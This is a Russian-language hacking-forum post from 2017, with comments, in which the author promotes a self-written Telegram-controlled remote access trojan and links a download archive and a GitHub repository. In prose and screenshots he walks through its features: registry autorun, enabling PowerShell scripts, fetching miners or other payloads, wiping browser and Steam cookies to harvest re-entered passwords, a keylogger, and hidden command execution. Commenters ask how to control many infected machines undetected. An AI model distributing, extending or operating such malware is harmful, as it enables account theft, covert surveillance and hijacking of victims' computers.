Загрузка...
Author's article Stealing passwords "from everything" with a small RMS
  1. Енот272_inactive171964
    Енот272_inactive171964 Topic starter Sep 29, 2017 Ушел на покой 372 Sep 6, 2017
    Этот гайд завершает мою эпопею с написанием собственного RMS (RAT). Легкий и маленький дистрибутив имеет ряд приятных функций, которые помогут вам угнать пароли от стима, одноклассников и вконтакта, а так же скачивать ПО и запускать скрипты PowerShell. Чем так хорош PowerShell? Набери в гугле это словосочетание "powershell hack" и офигей от моря различных скриптов которые позволят расширить функционал моей тулзы до небес)))

    Итак, от предисловия к делу. Основные команды управления будут показаны в видео, а так же будет показан процесс работы программы. Вы так же её можете скачать по адресу rar архив и отредактировать конфиг бота под себя - https://yadi.sk/d/4PC45dbj3NLYav
    Или скомпилировать код с помощь CX_FREEZE самостоятельно для любой винды, начиная с висты.
    Скоро код по-человечески выложу на гитхаб (уже) [https://github.com/enot-pogromist/simple_rat_bot] , там же постепенно будут появляться сниппеты PowerShell'а.
    Видео - Гайд:

    Code
    ВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.



    Основной Гайд:

    [IMG]

    Итак, при запуске sfx архива мы получаем программу, запущенную от имени администратора, для того что бы изменить два параметра реестра - на автозапуск и получение разрешения на запуск powershell скриптов, которые мы будем качать потом из интернета.

    [IMG]

    В коде функция старт выглядит именно так. Она и добавляет эти два ключа. Вызывается эта функция командой:

    [IMG]

    Далее идет стандартное приветствие, когда наш бот запустится на машине пользователя. Так мы поймем, что ключи прописаны
    и все работает штатно. Следующей командой мы можем, например, докачать какой нибудь майнер:

    [IMG]

    Нам нужно будет набрать /wget и адрес файла в интернете. Так же можно скачивать любые другие программы и скрипты.
    А следующей функцией у нас будет удаление куки всех браузеров и стима:

    [IMG]

    Она позволит стереть регистрационные данные пользователя, заставив его ввести повторно все пароли, от всех акков.
    Но пока я остановился на пяти вариантах кукис, для Хрома, ЯндексБро, Стима, Лисицы и Оперы:

    [IMG]

    Шлите мне местоположения куки других игр/приложений/всей ерунды для того что бы программа стала удобнее. Не хочется
    лазить и тереть ручками всё самому.

    А вот две следующих команды позволят нам начать слежку за клавиатурой и загрузку ***** когда мы захотим.

    [IMG]

    Эта команда запусит Кейлоггер.

    [IMG]

    А эта позволит нам скачать ****.... А теперь я расскажу еще об трех командах которые вам пригодятся, например, запуск
    программ с любыми параметрами, причем скрытый:

    [IMG]

    Это команда /cmd, а за ней будут следовать любые параметры, какие вам заблагорассудится, отчет о том как работает
    присылается тут же и вы можете просмотреть все ****.

    [IMG]

    А так же есть стандартные программы перемещения по дирректориям - ls и cd соответственно, их функционал соответствует
    BusyBox, ничего особенного вообщем:

    [IMG]

    В результате работы над этим скриптом пострадала 1 (компьютерная) мышка, 1 банка кофе, 1 блок сигарет, 1 мозг, моё
    самоуважение.

    PS. Вебка работает только тогда - когда программа - скрипт, как компилируется - падает и не поднимается. За сим эту хрень
    выбрасываю в угоду скорости и надежности.

    ЗЫ: Подпишись на Ютьюб, тебе жалко шо ле?

    #МояСтатья
     

Comments

    1. rAz_inactive92874
      rAz_inactive92874 Sep 29, 2017 Татар без татарки - как чай без заварки 21 Mar 11, 2017
      Го про майнеры, обниму и зацелую
       
    2. simplx0r
      simplx0r Oct 1, 2017 Banned 51 May 10, 2017
      годнота
       
    3. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 1, 2017 Ушел на покой 372 Sep 6, 2017
      Еще не добрался до этой темы, в перспективе, может, но не в приоритете.
       
    4. TrustSeller777
      TrustSeller777 Oct 1, 2017 Banned 501 Aug 31, 2017
      Годно, буду ждать расширения функционала
       
    5. renameduser_44552
      годно:vo:
       
    6. stapik
      stapik Oct 2, 2017 Дедушка онлайна!! 1620 Nov 15, 2016
      Молодец..если все это можешь сам..Светлая твоя голова.Удачи тебе во всем!
       
    7. ProgramDeveloper
      ProgramDeveloper Oct 2, 2017 Banned 2 Sep 23, 2017
      Годно.
       
    8. sadness777
      sadness777 Oct 2, 2017 Banned 143 Sep 12, 2017
      Крутяяяяяя
       
    9. renameduser_100804
      renameduser_100804 Oct 2, 2017 Banned 230 Apr 6, 2017
      очень-очень годно:panda::panda:
       
    10. presiDENtKOT
      presiDENtKOT Oct 2, 2017 Изменить статус 57 Aug 25, 2017
      Годнота подъехала)
       
    11. Ethereum_CIassic
      Накидаем лайки парню
       
    12. LevPC
      LevPC Oct 2, 2017 Banned 120 Jul 5, 2017
      Еще бы это все провернуть, а то чет сложна
       
    13. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 2, 2017 Ушел на покой 372 Sep 6, 2017
      не сложно, если что пиши в лс вк
       
    14. Holy_Only
      Holy_Only Oct 2, 2017 Banned 195 Sep 2, 2016
      Годненько
       
    15. tyrant_inactive31523
      Можно неограниченное количество юзеров добавлять?? Если будет много, то всем одна команда будет идти?
       
    16. Kaleb80
      Kaleb80 Oct 3, 2017 57 Sep 27, 2017
      ответь пожалуйста, выше задавали уже вопрос. На сколько тачек его можно ставить на одну или несколько? И если будит запущено на нескольких то как отдельно посылать команды только одной или на оборот массово всем посылать, а не в отдельности каждой? Так же какой командой запускать на удаленной тчаке где бот, скаченный файл и желательно без палево.
       
    17. TImd_inactive104973
      TImd_inactive104973 Oct 3, 2017 Banned 161 Apr 22, 2017
      Эта прога как-то может раздобыть пароль от виндовс?
       
    18. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 3, 2017 Ушел на покой 372 Sep 6, 2017
      Пока один юзер, это связано с внутреними ограничениями телеги, но их можно обойти, патч ждите в ближайшее время.
       
    19. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 3, 2017 Ушел на покой 372 Sep 6, 2017
      Нет. Даже о таком не думал. Нафига, чел, он тебе нужен?
       
Top
Loading...